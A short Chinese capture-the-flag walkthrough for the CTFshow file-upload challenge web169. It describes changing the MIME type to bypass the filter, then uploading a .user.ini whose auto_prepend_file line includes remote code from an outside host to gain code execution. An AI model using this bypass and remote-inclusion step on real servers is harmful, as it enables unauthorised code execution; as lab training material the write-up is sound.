0
点赞
收藏
分享

微信扫一扫

CTFshow 文件上传 web169

覃榜言 2022-02-17 阅读 84

目录


思路

查看源代码,要求上传zip

上传zip后抓包,返回错误,把文件类型改成image/png,提示null

清空全部内容,提示上传成功,文件后缀也可以任意改

初步尝试发现< > ?都被过滤了,肯定不能直接写php代码了,不过可以上传php文件,就可以利用.user.ini进行日志文件包含和远程文件包含(条件需要当前目录有可执行的php文件,所以先要上传php,内容无关紧要)

.user.ini

auto_prepend_file=http://2002459365

访问上传的php文件,回显成功直接rce拿到flag


总结

举报

相关推荐

CTFshow 文件上传 web163

CTFshow 文件上传 web152

CTFshow 文件上传 web158

CTFshow 文件上传 web168

CTFshow 文件上传 web170

ctfshow——文件上传

ctfshow 文件上传161-167

0 条评论